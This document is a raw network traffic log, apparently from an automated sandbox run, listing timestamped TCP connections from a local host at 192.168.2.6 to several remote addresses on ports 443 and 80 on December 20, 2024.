                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.385993958 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.386014938 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.386259079 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.409693003 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.409794092 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.409945011 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.410000086 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.815742016 CET4434995152.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.815752983 CET49951443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.815797091 CET49951443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.815819025 CET49951443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.833976030 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.834338903 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.834362984 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.834805012 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.835195065 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.835438013 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.835448980 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.835517883 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.876879930 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.156330109 CET44349959116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.156359911 CET44349959116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.156424046 CET49959443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.156434059 CET44349959116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.157074928 CET49959443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.157277107 CET49959443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.157294035 CET44349959116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.158781052 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.158999920 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.159023046 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.159790039 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.159912109 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.159972906 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.160708904 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.160727978 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.161134958 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.161201000 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.161746979 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.161827087 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.162115097 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.162178040 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.162825108 CET49972443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.162853003 CET44349972116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.162921906 CET49972443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.163254976 CET49972443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.163264990 CET44349972116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.206386089 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.206393957 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.206417084 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.206430912 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.252356052 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.252381086 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.272435904 CET4434996020.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.272545099 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.274399996 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.274413109 CET4434996020.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.274652004 CET4434996020.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.275810003 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.275875092 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.275886059 CET4434996020.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.276032925 CET49960443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.279166937 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.279278994 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.279414892 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.281306028 CET49961443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.281327009 CET4434996120.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.323359013 CET4434996020.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.490128040 CET44349970204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.490385056 CET44349969204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.490411997 CET49970443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.490420103 CET44349970204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.490547895 CET49969443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.490557909 CET44349969204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.491514921 CET44349970204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.491599083 CET49970443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.491601944 CET44349969204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.491683960 CET49969443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.492878914 CET49970443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.492947102 CET49969443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.492973089 CET44349970204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.493015051 CET44349969204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.533516884 CET49969443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.533524990 CET44349969204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.533555984 CET49970443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.533569098 CET44349970204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.127298117 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.127477884 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.127531052 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.129460096 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.129534006 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.129610062 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.131472111 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.131525040 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.131576061 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.370142937 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.370223999 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.370292902 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.407193899 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.407525063 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.407552958 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.408581018 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.408644915 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409189939 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409275055 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409596920 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409609079 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409728050 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409760952 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.567148924 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.567529917 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.567563057 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.568660021 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.568748951 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569066048 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569139004 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569238901 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569248915 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569277048 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569288015 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.611954927 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.630831003 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.630873919 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.631169081 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.631452084 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.631469965 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003278971 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003381968 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003921986 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003935099 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003957033 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003999949 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.346393108 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.346596956 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.346659899 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.349132061 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.349153996 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.031908989 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.031986952 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.032444000 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.032458067 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034528971 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034537077 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034631014 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034641027 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034646988 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034651995 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034787893 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034801006 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034811020 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034827948 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034904957 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034925938 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034981966 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.035152912 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.035392046 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.035403013 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291547060 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291558981 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291626930 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291631937 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291692972 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291695118 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.645759106 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.645857096 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:22.997288942 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:22.999767065 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:22.999797106 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.000622034 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.002366066 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.002428055 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.002439976 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.003021002 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.043354988 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.559420109 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560448885 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560499907 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560551882 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:23.560581923 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521112919 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521138906 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521156073 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:32.521177053 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.705946922 CET4970480192.168.2.623.193.114.26
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.826427937 CET804970423.193.114.26192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.827065945 CET4970480192.168.2.623.193.114.26
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540666103 CET49969443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540667057 CET49970443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540683985 CET44349969204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.540688038 CET44349970204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080498934 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080543995 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080549955 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.080579996 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.303925991 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.303987026 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.304158926 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.304809093 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.304835081 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412214041 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412273884 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412360907 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412607908 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.412626982 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.627804995 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.628386974 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.628451109 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.629456043 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.629550934 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.629962921 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.630037069 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.683773994 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.683820009 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.731158018 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.525682926 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.525841951 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.527568102 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.527590990 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.528407097 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530262947 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530322075 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530333996 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.530466080 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:40.575337887 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072483063 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072717905 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072808027 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072897911 CET50103443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:41.072937965 CET4435010320.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:58.945647955 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:58.945743084 CET4435010423.44.201.7192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:58.945967913 CET50104443192.168.2.623.44.201.7
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.756938934 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.756983995 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.757112980 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.757697105 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:59.757708073 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.970851898 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.970953941 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.973267078 CET50154443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.973277092 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.973608971 CET4435015420.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:33:01.974805117 CET50154443192.168.2.620.198.118.190
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.584387064 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.585347891 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.585526943 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.585974932 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.586080074 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.899039030 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.900127888 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901180983 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901223898 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901442051 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901566029 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901750088 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.901839972 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.902004004 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.902091026 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.902174950 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.268605947 CET61356443192.168.2.6172.64.41.3
